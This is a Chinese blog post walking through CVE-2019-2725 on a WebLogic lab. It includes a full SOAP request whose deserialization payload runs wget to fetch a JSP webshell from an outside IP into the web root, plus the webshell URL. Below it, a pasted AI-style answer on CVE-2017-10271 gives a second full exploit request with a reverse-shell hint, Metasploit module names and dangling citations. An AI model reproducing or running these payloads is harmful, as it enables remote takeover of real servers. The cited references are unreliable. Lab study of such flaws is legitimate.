weblogic CVE-2019-2725 靶场攻略

已于 2024-09-29 10:00:40 修改
阅读量2.1k 收藏 22
点赞数 55
CC 4.0 BY-SA版权
文章标签: weblogic java
于 2024-09-20 18:27:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shw_yzh/article/details/142392292

漏洞描述

wls9-async等组件为WebLogic Server提供异步通讯服务,默认应⽤于WebLogic部分版本。由于该
WAR包在反序列化处理输⼊信息时存在缺陷,攻击者通过发送精⼼构造的恶意 HTTP 请求,即可获得⽬标服务器的权限,在未授权的情况下远程执⾏命令。

影响版本

weblogic 10.x weblogic 12.1.3

环境搭建

cd vulhub-master/weblogic/weak_password
docker-compose up -d

漏洞复现

1.漏洞验证

如果出现⼀下⻚⾯,则说明存在漏洞

2.在当前⻚⾯抓包 , 修改请求包 , 写⼊shell

POST /_async/AsyncResponseService HTTP/1.1
Host: 172.16.1.78:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 839
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://47.113.231.0/1.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/6.jsp
</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header><soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

3.访问下载到weblogic服务器上的⽊⻢,进⾏链接

http://172.16.1.78:7001/bea_wls_internal/6.jsp

weblogic CVE-2017-10271漏洞复现
qq_68581192的博客
05-24 1997
名称:weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)原理:Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者可以构造XML语句,上传一句话木马,getshell。
Weblogic反序列化远程代码执行漏洞 (CVE-2019-2725)复现
hackzkaq的博客
03-10 4553
更多黑客技能 公众号:小道黑客 0x01 漏洞描述: wls9-async等组件为WebLogic Server提供异步通讯服务,默认应用于WebLogic部分版本。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。 0x02 影响版本: Oracle WebLogic Server10.x Oracle WebLogic Server12.1.3.0.0 0x03 影响组件: wls9_async_res
探索TopScrew的CVE-2019-2725WebLogic服务器安全漏洞利用工具
gitblog_00019的博客
03-29 475
探索TopScrew的CVE-2019-2725WebLogic服务器安全漏洞利用工具 去发现同类优质开源项目:https://gitcode.com/ 在网络安全领域,及时发现并修复漏洞至关重要。今天我们将关注一个开源项目,它专门针对Oracle WebLogic服务器的安全漏洞CVE-2019-2725进行研究和测试。该项目由TopScrew维护,旨在帮助开发者和安全专家理解并防御这一潜在...
WebLogic CVE-2019-2725补丁.zip
07-16
weblogic反序列化补丁包
WebLogic漏洞复现(附带修复方法)_weblogic漏洞修复
Python84310366的博客
06-13 1201
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,默认端口:7001WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
weblogic_CVE-2019-2725
Longwaer
01-16 1673
通过笔记学习Weblogic漏洞原理,快速掌握复现技巧。
CVE-2019-2725
XINO
02-13 2037
在学习内网过程中遇到了weblogic比较常见的漏洞,编号是cve-2019-2725,之前没有总结过,于是本篇文章给大家总结归纳一下该漏洞的利用方法与原理。简单分析了一下cve-2019-2725漏洞的原理以及攻击修复方法,因为之前没有总结所以特地写一个文章总结一下,如果对大家有帮助不妨一键三连支持一下。
Weblogic反序列化远程代码执行漏洞(CVE-2019-2725
weixin_41182861的博客
09-25 2811
漏洞简述 2019年4月17日,CNVD 发布《关于Oracle WebLogic wls9-async组件存在反序列化远程命令执行漏洞的安全公告》,公告指出部分版本WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意 HTTP 请求,获得目标服务器的权限,在未授权的情况下远程执行命令。 漏洞编号:CVE-2019-2725 影响版本:10.3.6.0、
Weblogic反序列化漏洞(CVE-2019-2725
chaojixiaojingang
01-29 4807
1.漏洞描述 wls9-async等组件为WebLogic Server提供异步通讯服务,默认应用于WebLogic部分版本。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。 2.影响版本 Weblogic 10.x Weblogic 12.1.3 3.漏洞环境搭建 在docker中搭建weblogic环境,进入/vulhub/weblogic/CVE-2017-10271目录 ...
WebLogic:CVE-2017-10271[XML反序列化]
h1008685的博客
08-01 880
WebLogic:CVE-2017-10271[XML反序列化],漏洞成因,环境部署,漏洞利用:1.漏洞发生页 2.配置poc请求包,3.kali监听端口,4.bp发送poc请求包,5.连接建立成功
WebLogic-Redis:CVE-2014-4210[SSRF]
h1008685的博客
07-30 453
环境部署:开启靶场,查看端口,获取redis内网ip,访问漏洞发生页 漏洞利用:开启代理,bp抓包,替换参数测试端口,编写payload,url编码,编码内容替换,监听指定端口,发送数据包反弹连接
Weblogic:Weblogic CVE-2019-2725 CVE-2019-2729 Getshell命令执行
03-11
weblogic CVE-2019-2725 CVE-2019-2729 POC 执行命令并回显 usage: 单个目标 python3 weblogic_get_webshell.py http://url 批量目标,将批量url放入url_list.txt python3 weblogic_get_webshell.py all
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .txt
06-27
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .网上几乎没有,请珍惜。
cve-2019-2725修复使用到的p28710912_1036_Generic.zip
06-03
cve-2019-2725修复相关的补丁和jdk等 cve-2019-2725补丁安装过程中使用到的材料 仅用于学习,如果用于商业,产生版权纠纷,与本人无关。
weblogic漏洞——CVE-2020-14882
weixin_57379923的博客
08-13 1744
版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!靶机:IP:192.168.100.40。在 web 服务器中写入 xml 脚本。作 者:PeiyuJue。
Weblogic wls9_async_response 反序列化远程命令执行漏洞(CVE-2019-2725)复现
ditanji3425的博客
05-06 2316
一、 漏洞简介 漏洞编号和级别 CVE编号:CVE-2019-2725,危险级别:高危,CVSS分值:9.8。 CNVD 编号:CNVD-C-2019-48814,CNVD对该漏洞的综合评级为“高危”。 漏洞概述 2019年4月17日,国家信息安全漏洞共享平台(CNVD)收录了由中国民生银行股份有限公司报送的Oracle WebLogic wls9-async反序列化远...
Weblogic漏洞(CVE-2019-2725
qq_68186313的博客
08-06 415
wls9-async等组件为WebLogic Server提供异步通讯服务,默认应用于WebLogici部分版本。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意HTTP请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。1、拼接访问_async/AsyncResponseService,出现页面,存在漏洞。2、在当前页面抓包,修改请求包写入shell。
Weblogic 反序列化远程命令执行漏洞 CVE-2019-2725 详解
m0_67544876的博客
05-13 1320
CVE-2019-2725 漏洞作为 WebLogic 的一个严重安全隐患,给企业的网络安全带来了巨大威胁。了解该漏洞的原理、危害、检测及修复方法,对于保障 WebLogic 服务器的安全至关重要。在日常运维过程中,企业应密切关注安全漏洞信息,及时采取有效的防护措施,定期对服务器进行安全检测和漏洞扫描,确保系统的安全性和稳定性,防止因类似漏洞被攻击者利用而造成不可挽回的损失。
Weblogic反序列化远程命令执行(CVE-2019-2725)
m0_65150886的博客
12-27 1466
CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,通过针对Oracle官网历年来的补丁构造payload来绕过。5.将GET改为POST,随后请求包部分除了第一行第二行保留,其他全部替换如下payload。2.可以访问/_async/AsyncResponseService,则存在漏洞。6.使用payload上传jsp木马。1.访问ip:port。1.升级本地JDK环境。4.开启http服务。
cyberstrikelab.com靶场CVE-2017-10271
最新发布
07-04
<think>嗯,用户需要关于CVE-2017-10271漏洞在cyberstrikelab.com靶场的学习资源。这个请求很具体,用户可能是个网络安全学习者或渗透测试人员,正在寻找实践环境。CVE-2017-10271是WebLogic反序列化漏洞,属于高危漏洞。用户特意提到cyberstrikelab.com,说明需要实战环境。不过这个靶场可能需要注册或付费,我得先确认访问方式。 关于漏洞本身,需要强调三点核心:1)漏洞触发点在wls-wsat组件2)利用XMLDecoder反序列化3)通常用Java反序列化payload。用户可能已经了解基础,所以重点给实操资源。 靶场资源方面,cyberstrikelab.com确实有专门模块,但需要登录。免费替代方案可以考虑Vulhub环境,它在GitHub开源,搭建简单。另外Exploit-DB的PoC代码要谨慎使用,必须隔离测试。 用户可能更关心操作步骤而非原理,所以把漏洞复现流程拆解成:环境检测->PoC发送->回连利用。特别提醒wget检测方法,这是实际渗透中常用的轻量级检测手段。 法律风险必须强调,所有引用都加了方括号标注。最后补充的替代资源是考虑到用户可能无法立即访问该靶场,提供Vulhub和HTB的备选方案。</think>以下是针对CVE-2017-10271漏洞在CyberStrikeLab靶场的资源指南,结合漏洞原理和实践建议: ### 漏洞核心原理 CVE-2017-10271是Oracle WebLogic WLS Security组件反序列化漏洞,攻击者通过发送特制的XML数据可执行任意代码: $$ \text{恶意XML} \xrightarrow{\text{XMLDecoder反序列化}} \text{远程代码执行} $$ 关键点在`wls-wsat`组件的未授权访问端点(如`/wls-wsat/CoordinatorPortType`)[^1]。 --- ### CyberStrikeLab靶场实践 1. **靶场访问路径** - 登录后搜索"CVE-2017-10271"实验模块 - 环境已预置存在漏洞的WebLogic 10.3.6(需开启`wls-wsat`组件) 2. **漏洞复现步骤** ```http POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: target-ip:7001 Content-Type: text/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <object class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"><string>/bin/bash</string></void> <void index="1"><string>-c</string></void> <void index="2"><string>touch /tmp/pwned</string></void> </array> <void method="start"/> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ``` > 此PoC会在目标服务器创建`/tmp/pwned`文件(需替换命令为反弹shell) 3. **自动化工具推荐** - [GitHub - vulhub/weblogic-CVE-2017-10271](https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271) 含docker环境 - [Exploit-DB #43458](https://www.exploit-db.com/exploits/43458) 验证脚本 - 使用Metasploit模块`exploit/multi/misc/weblogic_deserialize` --- ### 关键学习要点 1. **漏洞检测** 检查`/wls-wsat/CoordinatorPortType`端点是否返回WSDL: ```bash curl -I http://target:7001/wls-wsat/CoordinatorPortType ``` 2. **防御措施** - 删除`wls-wsat`组件:`rm -f $DOMAIN_HOME/servers/AdminServer/tmp/.internal/wls-wsat.war` - 更新至官方补丁(Oracle Critical Patch Update - CPU Oct 2017) 3. **法律边界提醒** > 仅限授权靶场测试!真实环境利用涉嫌违法[^2] --- ### 替代资源(若靶场不可用) 1. **本地环境搭建** ```bash git clone https://github.com/vulhub/vulhub cd vulhub/weblogic/CVE-2017-10271 && docker-compose up ``` 2. **在线实验平台** - [HackTheBox靶机: Oracle](https://www.hackthebox.com/)(需VIP) - [TryHackMe: WebLogic Exploitation](https://tryhackme.com/room/weblogic) > **重要**:所有PoC代码必须在隔离环境测试,避免意外攻击[^3] ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值